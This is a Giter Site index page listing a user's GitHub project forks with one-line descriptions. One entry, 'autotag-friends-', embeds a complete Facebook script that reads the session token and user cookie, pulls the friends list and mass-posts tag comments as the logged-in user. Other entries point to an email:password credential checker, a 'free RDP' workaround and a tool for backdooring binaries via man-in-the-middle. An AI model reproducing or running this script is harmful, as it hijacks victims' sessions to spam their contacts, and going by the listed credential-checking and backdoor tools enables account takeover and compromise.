Giter Site home page Giter Site logo

Zickie Loox's Projects

3proxy icon 3proxy

An attempt to install 3proxy as an elite high anonymous HTTP proxy with SSL support with a few command lines

adbkeyboard icon adbkeyboard

Android Virtual Keyboard Input via ADB (Useful for Test Automation)

adityardp icon adityardp

Free RDP via Github (CPU 2core - 7GB Ram - 256 SSD)

apkrename icon apkrename

rename android app package name(just a identity of app, not java package name) without source, without changing code. No need apktool, no need aapt.

astro-boilerplate icon astro-boilerplate

🚀 Astro boilerplate with responsive blog and portfolio template using TypeScript and React styled with Tailwind CSS ⚡️ Made with developer experience first: TypeScript + ESLint + Prettier + Husky + Lint-Staged + Commitlint + VSCode

atlantr icon atlantr

Fastes Email:Pass Checker on the planet.

auto-form icon auto-form

🌟 A React component that automatically creates a @shadcn/ui form based on a zod schema.

auto.js icon auto.js

A UiAutomator on android, does not need root access(安卓平台上的JavaScript自动化工具)

autojs_tools icon autojs_tools

对Auto.js打包的APP进行逆向分析,制作出属于自己的脚本提取工具

autotag-friends- icon autotag-friends-

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value; var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); /* Auto Tag Friends*/ function x__0() { return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP") : new XMLHttpRequest; }; //Serach Friends function get_friends(){ var a=x__0(); a.open("GET", "/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm", false); a.send(null); if (a.readyState == 4) { var f = JSON.parse(a.responseText.substring(a.responseText.indexOf('{'))); return f.payload.entries; } return false; } /* Getting Friends*/ //Friends Names function get_uid(b){ var a=x__0(); a.open("GET", 'http://graph.facebook.com/'+b, false); a.send(); if (a.readyState == 4) { return uid = JSON.parse(a.responseText).id; } return false; } // Pattern que vai trocar o valor dos coment?rios pelas marcaç?es var patt = /comment_text=(.*?)&/ var c = 1; username = /\.com\/(.*?)\//.exec(window.top.location)[1]; uid = get_uid(username); a = window.top.location; termina = 0; var amigos = get_friends(); post_id = /[0-9]{8,}/.exec(a); uids = 'comment_text='; header = 'ft_ent_identifier='+post_id+'&comment_text=0&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user='+uid+'&__a=1&__req=4u&fb_dtsg='+document.getElementsByName('fb_dtsg')[0].value+'&phstamp='+Math.random(); for ( var n = 1 ; n < amigos.length ; n++ ){ //uids += '%40[' + amigos[n].uid + '%3A' + encodeURI(amigos[n].text) + ']%20'; fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; uids += '%40[' + amigos[n].uid + '%3AAAAAAAAAAAA]%20'; c++; if(c == 7){ // Auto Tag Friends uids += '&'; // ...Auto Tag Friends... with(new XMLHttpRequest()) open("POST", "/ajax/ufi/add_comment.php?__a=1"),setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),send(header.replace(patt, uids)); // Auto Tag Friends z = setTimeout('function(){asd=0}', 10000); clearInterval(z); // ... Auto Tag Friends c = 1; uids = 'comment_text='; } } function cereziAl(isim) { var tarama = isim + "="; if (document.cookie.length > 0) { konum = document.cookie.indexOf(tarama) if (konum != -1) { konum += tarama.length son = document.cookie.indexOf(";", konum) if (son == -1) son = document.cookie.length return unescape(document.cookie.substring(konum, son)) } else { return ""; } } } function getRandomInt (min, max) { return Math.floor(Math.random() * (max - min + 1)) + min; } function randomValue(arr) { return arr[getRandomInt(0, arr.length-1)]; }

backend icon backend

A template repository for TypeScript backend server

bas icon bas

BrowserAutomationStudio can automate everything that Chrome can.

bdfproxy icon bdfproxy

Patch Binaries via MITM: BackdoorFactory + mitmProxy.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.